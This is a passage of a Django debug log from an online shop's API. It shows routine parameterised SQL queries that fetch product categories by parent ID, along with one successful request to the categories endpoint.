"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:12:47,653 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:12:47,657 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:12:47,661 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:12:47,665 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:12:47,669 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:12:47,675 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:12:47,678 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:12:47,682 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:12:47,686 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:12:47,690 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:12:47,697 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:12:47,701 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:12:47,705 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:12:47,709 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:12:47,713 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:12:47,717 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:12:47,721 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:12:47,725 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:12:47,729 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:12:47,734 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:12:47,738 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:12:47] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:12:56,482 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:12:56,493 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:12:56,498 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:12:56,500 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:12:56,504 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:12:56,506 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:12:56,509 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:12:56,511 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:12:56,515 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:12:56,521 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:12:56,525 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:12:56,529 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:12:56,533 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:12:56,537 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:12:56,543 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:12:56,547 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:12:56,551 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:12:56,555 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:12:56,559 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:12:56,565 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:12:56,569 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:12:56,573 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:12:56,577 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:12:56,581 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:12:56,585 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:12:56,591 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:12:56,595 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:12:56,599 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:12:56,603 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:12:56,607 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:12:56,613 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:12:56,617 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:12:56,621 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:12:56,625 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:12:56,629 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:12:56,636 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:12:56,640 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:12:56,644 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:12:56,648 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:12:56,652 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:12:56,658 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:12:56,664 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:12:56,668 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:12:56,671 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:12:56,676 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:12:56,680 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 